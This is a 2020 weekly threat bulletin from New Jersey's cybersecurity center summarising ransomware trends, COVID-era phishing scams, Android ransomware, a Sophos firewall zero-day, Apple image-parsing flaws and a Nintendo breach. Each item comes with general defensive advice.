THE WEEKLY BULLETIN

April 30, 2020

TLP: WHITE

Garden State Cyber Threat Highlight

Providing our members with a weekly insight into the threats and malicious

activity directly targeting New Jersey networks.

The Ransomware Threat is Evolving

Image Source: Microsoft

Over the last several months, the NJCCIC has reported that multiple ransomware threat

actors have threatened to expose data stolen from ransomware victims if payment is not

made. This trend is continuing and, according to Microsoft, some ransomware threat actors

are exfiltrating data even if they do not plan to use it as leverage for payment. Additionally,

Microsoft’s Threat Protection Intelligence Team found that threat actors are compromising

networks for several months before deploying ransomware, extending their reach within

the network and waiting for the most opportune time in order to maximize their potential

profits. Recent cases reported to the NJCCIC are consistent with Microsoft's findings in

regards to persistence and data exfiltration. Furthermore, Microsoft found that some threat

actors maintain control over network systems in order to launch future attacks. Many

ransomware attacks begin with the exploitation of vulnerable internet-facing network

devices and devices with weak authentication requirements, such as Remote Desktop

Protocol (RDP) servers. As the NJCCIC discussed last week, there are roughly 30,000

internet-facing endpoints in NJ with RDP enabled – all possible vectors to launch a

ransomware attack. Despite this difficult time, healthcare and other critical services, as

well as small and medium size businesses (SMBs), are still targeted by ransomware. In

some cases, the victims have had to make the difficult decision to either pay the criminals

or accept the data loss, significantly impacting their operations. The NJCCIC advises

users and administrators to follow the recommendations provided by Microsoft and

ensure all internet-facing systems, such as RDP servers and Virtual Desktop endpoints,

require multi-factor authentication; search networks for malicious PowerShell,

Mimikatz, and Cobalt Strike activity; search for suspicious access to Local Security

Authority Subsystem Service (LSASS) and registry or security event log modifications;

ensure all systems are patched, including Citrix ADC, Pulse Secure VPN, Microsoft

SharePoint, Microsoft Exchange, and Zoho ManageEngine; and establish a

comprehensive data backup plan that includes keeping multiple, tested backups off the

network and in a separate and secure location. Microsoft provides additional details on

recent ransomware attacks in their blog post. The NJCCIC provides ransomware risk

mitigation strategies in our mitigation guide.

Announcement

Telework Guidance

The Cybersecurity and Infrastructure Security Agency (CISA) has provided a compilation

of telework guidance and resources from industry partners in an effort to assist

organizations and teleworkers in securing their remote working environment. Further

information can be found here. Additionally, the National Security Agency (NSA) has

provided guidance for telework collaboration services here.

Threat Alerts

US Federal Reserve Economic Relief Phishing Campaign

The NJCCIC’s email security solution has identified and blocked multiple COVID-19

phishing campaigns consistent with open-source reporting , including those recently

impersonating the US Federal Reserve with economic relief options through the Payment

Protection Program in order to steal banking credentials. Phishing emails from the “Federal

Reserve System” contain the subject line “Receive payment.” and include a link that, if

clicked, directs the victim to a spoofed website with legitimate logos, stock photos, and

FAQ section. Clicking on the “Get Economic Impact Payment Now” button displays a

drop-down menu of banks to choose from. A login box, containing the selected bank and

its logo, then prompts the victim to enter their banking credentials. If entered, an error

message will display as the credentials are sent to the threat actors in the background. The

NJCCIC recommends users and organizations educate themselves and others on these

continuing threats and tactics to reduce victimization. Users are advised to avoid clicking

links, opening attachments, or providing personal or financial information in response

to emails from unknown senders and exercise caution with emails from known senders.

If you are unsure of an email’s legitimacy, contact the sender via a separate means of

communication. We also advise users not to take action on emails promising economic

relief and, instead, obtain information from official sources.

Black Rose Lucy Ransomware Attempts to Extort Victims by Impersonating the FBI

Image Source: Check Point Research

Cyber-criminals have repurposed an Android botnet and dropper Malware-as-a-Service

(MaaS) to deliver the ransomware variant known as Black Rose Lucy. Check Point

researchers first identified the MaaS in September 2018, which is believed to be developed

by the Russian-speaking Lucy Gang. The ransomware masquerades as a video application

and is commonly delivered via social media links and instant messenger applications. In

order to bypass Android security, a message is displayed requesting the user to enable the

Streaming Video Optimization (SVO). If clicked, the cyber-criminal is granted access to

the accessibility service and encryption is initiated on the device. A ransom note appears

in the web browser window claiming that the encryption was carried out by the Federal

Bureau of Investigation (FBI) due to pornographic content found on the device.

Furthermore, the victim is instructed to pay a $500 fine by providing their credit card

information. It is important to note that the FBI would not conduct operations in this

manner, nor would they ask for credit card details. This use of mobile ransomware

highlights an expansion in the attack landscape. The NJCCIC recommends users exercise

caution when clicking on links within social media posts or instant messages.

Additionally, we urge users to pay close attention to permissions and functions that are

enabled when using applications. Further information can be found in the Check Point

Research article.

Threat Actors Capitalize on Unemployment Fears

Image Source: Help Net Security

As the current pandemic has caused occupational loss and furloughs, cyber-criminals are

capitalizing on unemployment concerns. One campaign currently circulating is a phishing

email crafted to appear as a Zoom meeting invitation that requests the recipient to join for

the purpose of “contract suspension” or “termination trial.” Additionally, the email claims

that the meeting will begin momentarily, enticing the user to click without further scrutiny.

If the link is clicked, the user is directed to a spoofed Zoom login page requesting the user’s

“email” credentials. Once the credentials are entered, the user is redirected to a Zoom help

page, and the credentials are sent to the threat actor. Another phishing campaign claims to

be from an outsourced human resources contractor and requests recipients to view a

fictitious payroll report that includes additional stimulus. The link is hosted on Google

Docs and contains another link that, if clicked, downloads unknown malware. A third scam

that has surfaced are employment ads offering teleworking opportunities. After the victim

acquires an interview and is given an offer of employment, they are prompted to complete

various forms, such as a W-9 and direct deposit. The scammer is then provided with all the

details required to drain bank accounts and steal the victim’s identity. The NJCCIC

reminds users to exercise caution when opening unsolicited emails and confirm details

via an alternate means of communication. Additionally, jobseekers are urged to research

potential employers and businesses prior to providing sensitive information.

Furthermore, we urge users to educate others of these and similar scams to avoid

victimization.

Zero-day Affecting Sophos XG Firewall Actively Exploited

Image Source: Sophos Community

A zero-day Structured Query Language (SQL) injection vulnerability affecting Sophos’

XG Firewall was discovered on April 22, 2020 and is actively being exploited. Threat

actors are deploying trojan malware, dubbed Asnarök by Sophos researchers, in an attempt

to harvest XG Firewall-resident data such as usernames and hashed passwords for local

device administrators (admin), user portal accounts, and accounts used for remote access.

Successful exploitation may lead to remote code execution on both physical and virtual

unpatched firewalls. Sophos has deployed a hotfix to devices that receive automatic

updates, which includes a message on the management interface indicating if the device

was affected. In addition to the hotfix, Sophos recommends resetting device admin

accounts and changing local user account passwords – including accounts that may have

re-used these credentials – in order to repair compromised devices. The NJCCIC urges

Sophos XG Firewall admins who may not have enabled automatic updates to apply the

hotfix immediately. Additionally, we recommend disabling HTTPS admin services and

unused user portals on the WAN interface. For further guidance and technical details,

please review the Sophos security advisory.

Threat Actors Target Trucking Companies

The logistics industry, including trucking companies, has played a critical role during the

COVID-19 pandemic despite supply shortages. Threat actors are taking advantage of this

crisis through vishing attempts offering fraudulent loan forgiveness to small businesses

from the CARES Act, impersonation scams of legitimate logistic companies offering fake

work-from-home positions to repackage and reship items, and the targeting of systems and

networks. These scams present opportunities for fraud, identity theft, and future cyber-

attacks as victims may inadvertently disclose sensitive information. The NJCCIC

recommends users update to strong passwords for all accounts, enable multi-factor

authentication where available, keep all software and hardware updated, exercise

caution with unexpected or suspicious emails and other communications, and

refrain from sharing personal or financial information without verifying the requestor.

Organizations are encouraged to adopt a defense-in-depth cybersecurity strategy, apply

the principle of least privilege, and establish a comprehensive data backup plan. More

information can be found in the Security Boulevard article.

Vulnerability Advisory

Project Zero Discovers Zero-Click Flaws in Apple Operating

Systems

Researchers from Google’s Project Zero discovered six flaws in Apple’s multimedia

processing component Image I/O, a framework responsible for parsing and working with

image files. Image I/O ships with iOS, macOS, tvOS, and watchOS, and most apps running

on these operating systems (OSs) rely on it for processing image metadata. Multimedia

processing components, including Image I/O, are desirable attack surfaces because they

do not require user interaction to run code on the targeted system, sometimes referred to

as “zero-click” attacks. In addition to the Image I/O flaws, the researchers discovered eight

bugs in Open EXR, an open-source library used for parsing EXR image files that come as

a component with Image I/O. All of the discovered vulnerabilities have been patched.

Researchers stressed that more research needs to be conducted into multimedia processing

components. The NJCCIC recommends users running Apple OSs ensure systems are

updated to the latest vendor-supported patch levels. More information can be found in

the Project Zero blog post.

Breach Notification

Nintendo

Nintendo is restricting logins and resetting passwords for up to 160,000 Nintendo Network

ID (NNID) accounts that may have been accessed by unauthorized third parties. Potentially

exposed information may have included name, date of birth, gender, country/region, and

email address. Users are advised to establish strong passwords and refrain from reusing

the same password across multiple accounts.

Threat Profiles

Android | ATM Malware | Botnet | Cryptocurrency-Mining | Exploit Kit

Industrial Control Systems | iOS | macOS | Point-of-Sale | Ransomware | Trojan

ICS-CERT Advisories LCDS LAquis SCADA

Patches

Adobe (Bridge, Illustrator, Magento)

Chrome | Cisco | Juniper

Samba | VMware

WordPress (1, 2)

Throwback Thursday

COVID-19 Cybersecurity Resources

Social Engineering Awareness

The Human Brain is Both a Liability and Asset for Cybersecurity: Here’s Why

Comment: Curious users may find themselves easily drawn to requests, offers, or topics

of interest and suddenly become the victim of specially-crafted phishing emails or business

email compromise (BEC) scams. Cyber-criminals use evolving social engineering tactics

in order for their target to take the bait and quickly practice the bad habit of clicking before

thinking. However, users can arm themselves against the “reel” deal and develop healthy

cybersecurity habits through frequent security awareness training and repetitive phishing

simulations.

Cyber at a Glance

Aimed at Moving Targets: Five Cyber Threats That Put Mobile Devices at Risk

Comment: Many people use mobile devices to connect and communicate with others, and

may do so with a false sense of security. Cyber-criminals can target users and vulnerable

devices to gain access to sensitive information, install malware, and infiltrate networks and

other systems. The security risks of data leakage and cyber-attacks can be reduced by

installing reputable apps, checking security and privacy settings, keeping mobile devices

updated, and exercising caution with suspicious communications, websites, and apps.

The information contained in this product is marked Traffic Light Protocol (TLP):

WHITE. Disclosure is not limited. Subject to standard copyright rules, TLP: WHITE

information may be distributed without restriction.

TLP: WHITE

Questions?

Email a Cyber Liaison Officer at njccic@cyber.nj.gov.

The Weekly Bulletin aggregates information about cyber threats, vulnerabilities, and other resources to promote shared awareness and the adoption of best practices. Designed for a general audience, the Bulletin aims to bridge the information sharing gaps between all levels of government, the private sector, and our citizens.

Connect

Share